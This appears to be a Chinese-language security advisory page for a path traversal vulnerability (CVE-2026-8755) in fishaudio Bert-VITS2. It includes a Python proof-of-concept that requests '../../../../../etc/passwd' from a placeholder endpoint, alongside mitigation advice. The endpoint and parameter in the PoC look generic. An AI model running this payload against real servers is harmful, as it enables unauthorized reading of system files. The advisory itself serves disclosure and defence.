CVE-2026-8755 CVSS 7.3 高危

CVE-2026-8755 fishaudio Bert-VITS2 路径遍历漏洞

披露日期: 2026-05-17

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-8755

漏洞类型

路径遍历

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

fishaudio Bert-VITS2

漏洞概述

fishaudio Bert-VITS2 在其 Model Handler 组件中存在安全漏洞，具体涉及 hiyoriUI.py 文件内的 _get_all_models 函数。该漏洞允许攻击者通过操纵特定参数发起路径遍历攻击。由于产品采用持续交付和滚动发布机制，受影响的版本包括提交哈希 8f7fbd8c4770965225d258db548da27dc8dd934c 之前的所有版本。攻击者无需认证即可远程利用此漏洞，可能导致敏感信息泄露或系统完整性受损。目前厂商尚未对该披露做出回应，且相关利用代码已公开。

技术细节

该漏洞的核心问题在于 fishaudio Bert-VITS2 项目中 `hiyoriUI.py` 文件的 `_get_all_models` 函数未能正确处理用户提供的输入。该函数在处理模型路径时，缺乏对目录遍历字符（如 `../`）的有效过滤，导致攻击者能够将路径引导至 Web 根目录之外。根据 CVSS 3.1 向量 `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L`，此漏洞具有低攻击复杂度，无需任何权限和用户交互即可通过网络利用。攻击者可通过发送特制的 HTTP 请求，读取服务器上的敏感配置文件（如 `/etc/passwd`），或在特定情况下写入文件，从而对系统的机密性、完整性和可用性造成影响。由于项目使用滚动发布，修复前建议手动检查代码逻辑。

攻击链分析

STEP 1

侦察

攻击者识别出目标正在运行 fishaudio Bert-VITS2 服务，并确定其版本受漏洞影响（commit 8f7fbd8c 之前）。

STEP 2

漏洞利用

攻击者构造包含路径遍历字符（如 '../'）的恶意 HTTP 请求，发送给 hiyoriUI.py 中的 _get_all_models 接口。

STEP 3

数据访问

服务器因未过滤输入，将请求路径解析至系统敏感目录（如 /etc/passwd），并返回文件内容给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

"""
PoC for CVE-2026-8755: Path Traversal in fishaudio Bert-VITS2
Vulnerable Endpoint: _get_all_models in hiyoriUI.py
"""

target_url = "http://target-host:port/api/models"  # Replace with actual target URL

# Payload attempting to read /etc/passwd using path traversal sequences
payload = {
    "path": "../../../../../etc/passwd"
}

try:
    response = requests.get(target_url, params=payload, timeout=10)
    
    if response.status_code == 200:
        if "root:" in response.text:
            print("[+] Vulnerability confirmed! Sensitive file content retrieved:")
            print(response.text)
        else:
            print("[-] Target may be patched or payload incorrect.")
            print("Response:", response.text[:200])
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"[!] An error occurred: {e}")

影响范围

fishaudio Bert-VITS2 <= commit 8f7fbd8c4770965225d258db548da27dc8dd934c

防御指南

临时缓解措施

在未获得官方补丁前，建议通过修改代码对 _get_all_models 函数的输入参数进行严格的路径规范化处理，禁止包含父目录引用符的请求通过。同时，建议限制 Web 服务的文件系统访问权限，避免读取系统敏感目录。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8755
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8755
3 Details https://www.cvedetails.com/cve/CVE-2026-8755/
4 VulDB https://vuldb.com/cve/CVE-2026-8755
5 Link https://gist.github.com/YLChen-007/99859f4f836cca523a5982645e7fdd97
6 Link https://vuldb.com/submit/811173
7 Link https://vuldb.com/vuln/364382
8 Link https://vuldb.com/vuln/364382/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表